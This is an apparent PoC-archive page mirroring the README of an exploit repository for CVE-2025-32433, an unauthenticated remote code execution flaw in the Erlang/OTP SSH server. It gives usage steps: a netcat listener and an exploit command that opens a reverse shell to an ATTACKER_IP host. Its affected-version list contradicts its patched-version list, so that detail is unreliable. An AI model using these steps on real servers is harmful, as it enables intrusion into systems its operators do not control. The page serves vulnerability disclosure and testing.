Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-32433 PoC — Erlang/OTP SSH Vulnerable to Pre-Authentication RCE

Source
https://github.com/dollarboysushil/CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE
Associated Vulnerability
Title:Erlang/OTP SSH Vulnerable to Pre-Authentication RCE (CVE-2025-32433)
Description:Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This issue is patched in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. A temporary workaround involves disabling the SSH server or to prevent access via firewall rules.
Description
PoC showing unauthenticated remote code execution in Erlang/OTP SSH server. By exploiting a flaw in SSH protocol message handling, an attacker can execute arbitrary commands on the target without valid credentials.
Readme
# CVE-2025-32433 - Erlang/OTP SSH RCE PoC

![CVE-2025-32433](https://img.shields.io/badge/CVSS-10.0-critical)

## Overview

PoC showing **unauthenticated remote code execution** in Erlang/OTP SSH server.  
By exploiting a flaw in SSH protocol message handling, an attacker can execute arbitrary commands on the target without valid credentials.

- **CVE:** CVE-2025-32433
- **CVSS Score:** 10.0 (Critical)
- **Affected Versions:**
  - OTP-27.3.3 and earlier
  - OTP-26.2.5.11 and earlier
  - OTP-25.3.2.20 and earlier

This issue is patched in OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20.

## References

- [Unit42 Advisory](https://unit42.paloaltonetworks.com/erlang-otp-cve-2025-32433/)
- [PoC Repository](https://github.com/omer-efe-curkus/CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC)
- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2025-32433)

## Usage

**Listener Setup:**

```bash
nc -lvnp 1234
```

![alt text](images/image.png)
**Run Exploit:**

```bash
python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
```

- `--rhost` : Target IP
- `--rport` : Target SSH port
- `--lhost` : Your IP for reverse shell
- `--lport` : Your listener port

![alt text](<images/image copy.png>)

![alt text](<images/image copy 2.png>)

## Disclaimer

This repository is for **educational purposes only**. Do not use this exploit against systems you do not own or have explicit permission to test. Misuse may be illegal and is strictly prohibited.
File Snapshot

 [4.0K]  /data/pocs/31df9e6010068249393ad5bf7d7205d0705b5035
├── [2.4K]  CVE-2025-32433-dbs.py
├── [4.0K]  images
│   ├── [ 24K]  image copy 2.png
│   ├── [ 35K]  image copy.png
│   └── [ 10K]  image.png
└── [1.5K]  README.md

1 directory, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →